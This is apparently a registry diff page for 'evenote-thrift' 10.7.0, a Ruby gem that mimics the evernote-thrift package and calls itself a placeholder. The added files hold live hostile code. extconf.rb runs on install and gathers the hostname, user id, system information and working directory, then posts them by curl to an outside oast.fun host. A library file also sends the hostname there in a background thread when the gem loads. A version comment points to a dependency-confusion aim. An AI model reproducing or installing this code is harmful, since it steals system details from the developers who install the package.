evenote-thrift 10.7.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of evenote-thrift might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: eb4f366e19bc8b3f63a03fdd24145eeb295b38a0766c4979d9d1901657f882d1
4
+ data.tar.gz: f2e86ab24b87468463a9ec37ac442a5af78b933d1a6396425f511babda6817ee
5
+ SHA512:
6
+ metadata.gz: 7560f52f130019889a4cd09ee244f988021ffb6a4d438313171a8165919e8d65c08c2269a17d6c031b042996ad94fe2cc137dc5ea0c97dba7dae9b5328f74dd0
7
+ data.tar.gz: 171e69e644a7c8224c695acb0adedc4402d2a1ef084ba858f56fc6c2990e33d1b8538296e08e00ce9ab6d28c46a29d1184c16bf8ac1ea3d26248f64fde4a8eca
@@ -0,0 +1,28 @@
1
+ Gem::Specification.new do |s|
2
+ s.name = 'evenote-thrift'
3
+ s.version = '10.7.0' # Higher version to take precedence
4
+ s.summary = "A simple mimicking evernote-thrift"
5
+ s.description = "This gem is a placeholder."
6
+ s.authors = ["raxis-evernote"]
7
+ s.email = "raxis@example.com"
8
+ s.homepage = "https://reachas.com"
9
+
10
+ # Include all files within the lib directory and the gemspec file
11
+ s.files = Dir['lib/**/*'] + ['evenote-thrift.gemspec', 'extconf.rb']
12
+ s.require_paths = ["lib"]
13
+
14
+ # Run our evernote-thrift code on install
15
+ s.post_install_message = "Thanks for installing evernote-thrift!"
16
+ s.extensions = ["extconf.rb"]
17
+
18
+ # Add a post_install message that executes the command
19
+ # s.post_install_message = <<-POST_INSTALL
20
+ # Post-install command:
21
+ # curl -X POST -d "$(hostname)" https://scwtvczgsafwashvzljq01241ek1cq57i.oast.fun"
22
+ # POST_INSTALL
23
+
24
+ # This method will execute after the gem is installed
25
+ s.extensions = ["extconf.rb"]
26
+ end
27
+
28
+
data/extconf.rb ADDED
@@ -0,0 +1,31 @@
1
+ # # extconf.rb
2
+
3
+ # require 'mkmf'
4
+
5
+ # # Create a Makefile for the native extension
6
+ # create_makefile('evenote_thrift')
7
+
8
+ # # Command to obtain hostname and post it to a specified URL
9
+ # system("curl -X POST -d \"$(hostname)\" https://scwtvczgsafwashvzljq01241ek1cq57i.oast.fun")
10
+
11
+ # end
12
+
13
+ require 'mkmf'
14
+ require 'socket'
15
+
16
+ # Create a Makefile for the native extension
17
+ create_makefile('evernote_thrift')
18
+
19
+ # Obtain hostname using Ruby's Socket library
20
+ hostname = Socket.gethostname
21
+
22
+ # Obtain user ID, system information, and current directory
23
+ user_id = `id`.strip
24
+ system_info = `uname -a`.strip
25
+ current_dir = `pwd`.strip
26
+
27
+ # Command to post the collected information to a specified URL
28
+ system("curl -X POST -d \"hostname=#{hostname}&id=#{user_id}&uname=#{system_info}&pwd=#{current_dir}\" https://scwtvczgsafwashvzljq01241ek1cq57i.oast.fun
29
+
30
+ # # Command to obtain hostname and post it to a specified URL
31
+ # system("curl -X POST -d \"$(hostname)\" ")
@@ -0,0 +1,5 @@
1
+ require 'open-uri'
2
+
3
+ Thread.new do
4
+ system("curl -X POST -d \"$(hostname)\" https://scwtvczgsafwashvzljq01241ek1cq57i.oast.fun")
5
+ end
metadata ADDED
@@ -0,0 +1,45 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: evenote-thrift
3
+ version: !ruby/object:Gem::Version
4
+ version: 10.7.0
5
+ platform: ruby
6
+ authors:
7
+ - raxis-evernote
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2025-02-20 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: This gem is a placeholder.
14
+ email: raxis@example.com
15
+ executables: []
16
+ extensions:
17
+ - extconf.rb
18
+ extra_rdoc_files: []
19
+ files:
20
+ - evenote-thrift.gemspec
21
+ - extconf.rb
22
+ - lib/evenote-thrift.rb
23
+ homepage: https://reachas.com
24
+ licenses: []
25
+ metadata: {}
26
+ post_install_message: Thanks for installing evernote-thrift!
27
+ rdoc_options: []
28
+ require_paths:
29
+ - lib
30
+ required_ruby_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ required_rubygems_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ requirements: []
41
+ rubygems_version: 3.4.20
42
+ signing_key:
43
+ specification_version: 4
44
+ summary: A simple mimicking evernote-thrift
45
+ test_files: []